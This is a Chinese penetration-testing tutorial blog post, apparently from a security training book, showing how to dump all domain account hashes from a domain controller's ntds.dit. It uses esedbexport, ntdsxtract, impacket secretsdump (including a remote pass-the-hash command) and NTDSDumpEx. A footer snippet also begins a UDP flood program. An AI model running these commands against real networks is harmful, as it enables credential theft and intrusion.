首页 > 其他分享 >攻击域控丝滑小连招

攻击域控丝滑小连招

时间:2024-03-27 10:02:40浏览次数:25  
标签:滑小连招 Hash 攻击 控丝 导出 ntds 所示 impacket dit


如果已经获得本地管理员账号或是域管理员账号,那么下一个目标通常是域控制器,对于渗透测试人员来说,光荣与荣耀的那一刻就是成功从域控制器提取所有的哈希值。但即使是拥有管理员权限,也无法读取域控制器中存储的c:\Windows\NTDS\ntds.dit文件,因为活动目录始终访问这个文件,所有文件被禁止读出。下面介绍几种常用提取ntds.dit的方法。

01

使用esedbexport恢复ntds.dit

 

将从目标系统导出的ntds.dit放在本地Linux机器中进行解析,本次实验环境为Kail2.0。

在Kali中打开命令行输入命令下载libesedb。

wgethttps://github.com/libyal/libesedb/releases/download/20170121/libesedb-experimental-20170121.tar.gz

首先安装工具依赖环境,如图6-24所示,输入如下命令。

$ sudo apt-get install autoconf automake autopoint libtool pkg-config

 

图6-24安装工具依赖环境

 

将下载好的libesedb进行编译安装,依次输入命令:

$ ./configure$ make$ sudo make install$ sudo ldconfig

安装成功后会在系统/usr/local/bin中出现esedbexport程序,如图6-25所示。

 

图6-25查看esedbexport是否安装成功

 

在Kali中打开命令行进入存放ntds.dit目录中,使用esedbexport 恢复,输入如下命令来提取表信息,如图6-26所示,恢复时间视ntds.dit大小决定,导出成功会在同目录生成一个文件夹。这里的存储信息,我们只需要datatable和link_table。

esedbexport -m tables ntds.dit

 

图6-26使用esedbexport 打开ntds.dit

 

可以看到成功导出,如图6-27所示。

 

图6-27查看被打开后的ntds.dit内容

 

再下载使用ntdsxtract进行提取域信息,导出Hash。

下载,在Kali输入命令:

$ git clone https://github.com/csababarta/ntdsxtract.git

安装,在Kali输入命令:

python setup.py build && python setup.py install

然后将导出ntds.dit.export文件夹和SYSTEM文件一并放入ntdsxtract文件夹中,输入如下命令。

$ dsusers.py ntds.dit.export/datatable.3 ntds.dit.export/link_table.5 output --syshive SYSTEM --passwordhashes --pwdformat ocl --ntoutfile ntout --lmoutfile lmout |tee all_user.txt

成功将域内所有用户信息及Hash导出到all_user.txt中,如图6-28所示。

 

图6-28导出与内所有用户和Hash信息

 

导出到Hash可以放在在线网站破解,也可以本地使用hashcat进行破解或在域内直接进行PTH进行横向渗透。

Tips:ntds.dit中包含域内所有信息,不仅仅包括用户和Hash,也可以通过分析ntds.dit导出域内计算机信息或其他信息,如:

dscomputers.py ntds.dit.export/datatable.3 computer_output --csvoutfile all_computers.csv

该命令可以执行导出域内所有计算机信息,导出为csv格式,方便查看,如图6-29所示。

 

图6-29导出域内所有计算机信息

 

02

使用impacket工具包导出Hash

 

使用impacket工具包中的secretsdump 解析ntds.dit文件,导出Hash。

首先下载impacket工具包,在Kali下,输入如下命令下载该工具。

git clone https://github.com/CoreSecurity/impacket.git

下载成功后,将impacket工具包安装在Kali上,impacket是基于使用Python编写的,Kail默认安装了Python,直接输入命令,如图6-30所示。

python setup.py install

 

图6-30安装impacket

 

成功安装后,打开命令行进入ntds.dit和SYSTEM目录,输入如下命令,成功导出ntds.dit中所有Hash,如图6-31所示。

impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL

 

图6-31使用impacket-secretsdump导出用户和Hash

 

Tips:impacket还可以直接使用用户名和Hash进行验证,从远程域控制器读取ntds.dit转储域Hash,如图6-32所示:

impacket-secretsdump-hashesaad3b435b51404eeaad3b435b51404ee:135d82f03c3698e2e32bcb11f4da741b -just-dc pentest.com/[email protected]

 

图6-32使用impacket-secretsdump向DC获取信息

 

03

Windows下解析ntds.dit导出域账号及域Hash

 

使用NTDSDumpex.exe进行导出Hash操作。NTDSDumpex.exe下载地址:

https://github.com/zcgonvh/NTDSDumpEx/releases/download/v0.3/NTDSDumpEx.zip

首先将ntds.dit、SYSTEM和NTDSDumpex.exe放在同一目录中,打开cmd输入如下命令,域账号及域Hash被成功导出,如图6-33所示。

NTDSDumpex.exe -d ntds.dit -s system

 

图6-33使用NTDSDumpex.exe打开ntds.dit

 

 

 

Ms08067安全实验室专注于网络安全知识的普及和培训,是专业的“图书出版+培训”的网络安全在线教育平台,专注于网络安全领域中高端人才培养。

平台已开设Web安全零基础就业,Web高级安全攻防进阶,红队实战攻防特训,Java代码安全审计,恶意代码分析与免杀实战,CTF基础实战特训营,网络安全应急响应,安全工具开发,AI与网络安全等系统培训课程。实验室出版安全图书《Web安全攻防:渗透测试实战指南》、《内网安全攻防:渗透测试实战指南》、《Python安全攻防:渗透测试实战指南》、《Java代码审计:入门篇》等。

扫描客服微信 获取更多课件+学习资料

标签:滑小连招,Hash,攻击,控丝,导出,ntds,所示,impacket,dit
From: https://www.cnblogs.com/ms08067/p/18098243

相关文章

  • XSS跨站脚本攻击
    免责声明传播、利用本博客所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本博客及作者不为此承担任何责任,一旦造成后果请自行承担!谢谢!XSS跨站脚本攻击XSS是什么XSS全称呼跨站脚本,是将任意JavaScript代码插入到Web用户页面里执行以达到攻击目的的......
  • 服务器被攻击有什么表现?
    引言在现今高度互联的网络环境中,服务器安全已成为每个企业和个人站长不容忽视的重要议题。服务器作为承载关键业务和数据的核心设施,一旦遭受攻击,不仅可能导致服务中断、数据泄露,还可能带来严重的经济损失和声誉损害。本文旨在深入剖析服务器遭受攻击时的各种表现形式,并提出针......
  • 利用卷影拷贝服务攻击域控五大绝招
    在微软ActiveDirectory(活动目录)中,所有的数据都被保存在ntds.dit中,NTDS.DIT是一个二进制文件,它存在于域控制器中的%SystemRoot%\ntds\NTDS.DIT。ntds.dit包括但不限于Username、Hash、Group、GPP、OU等活动目录相关信息。它和SAM文件一样,是被Windows系统锁定的,我们来介绍一下如......
  • 攻击检测:全局智能监控与精准定位
    随着互联网的快速发展,网络安全问题日益凸显,其中分布式拒绝服务攻击(DDoS)已成为威胁企业网络安全的重要隐患。为了应对这一挑战,我们致力于为客户提供全面的DDoS防护服务,确保您的网络环境安全可靠,让您的业务持续运行。作为专业的网络安全服务提供商,我们拥有丰富的经验和先进的技术手......
  • 网络攻击
    被动攻击典型的是监听,最难被检测,重点是预防,主要手段是加密主动攻击假冒、重放、欺骗、消息篡改、拒接服务,重点是检测而不是预防,手段有防火墙、IDS、IPS等技术物理临近攻击防止现在人等乱进机房内部人员攻击内鬼渗透分发攻击软件开发出来未安装之前,被篡改......
  • DDOS攻击
    简介DDoS攻击(分布式拒绝服务攻击),原名Distributed Denial of Service,是一种常见的网络攻击手段。这种攻击方式通过利用多个计算机系统对目标服务器、服务或网络发起大量请求,导致目标无法处理这么多请求而崩溃或者响应速度变慢,从而影响正常用户的使用。DDOS攻击有多种类型,常......
  • xss跨站脚本攻击
    xss(cross-sitescripting)本因为css,因与css样式重名所以更名为xss。xss主要基于js完成恶意攻击XSS危害盗取用户账号窃取用户cookie,冒充用户身份进入网站劫持用户会话,执行任意操作刷流量,执行弹窗广告传播蠕虫病毒XSS漏洞验证PoC(ProofofConcept,概念验证,漏洞验证)EXP(......
  • 反外挂 DDos UDP 攻击只需客户端 开着游戏客户端
    #include<WINSOCK2.H>#include<iostream>#include<string>usingnamespacestd;#include<stdlib.h>#defineBUF_SIZE1377#pragmacomment(lib,"WS2_32.lib")intmain(){WSADATAwsd;SOCKETsHost;SOCKADDR_INse......
  • CTF 题型 SSRF攻击&例题总结
    CTF题型SSRF攻击&例题总结文章目录CTF题型SSRF攻击&例题总结Server-sideRequestForgery服务端请求伪造SSRF的利用面1任意文件读取前提是知道要读取的文件名2探测内网资源3使用gopher协议扩展攻击面Gopher协议(注意是70端口)python脚本(基于gopher转发监听)探测......
  • 最新Base64注入攻击和代码分析技术
    Base64注入攻击Base64注入攻击的测试地址在本书第2章。从URL中可以看出,参数ID经过Base64编码(“%3d”是“=”的URL编码格式),解码后发现ID为1,尝试加上一个单引号并一起转成Base64编码,如图4-64所示。 图4-64 当访问id=1'编码后的网址时(/4.3/base64.php?id=MSc%3d),页面返回错误......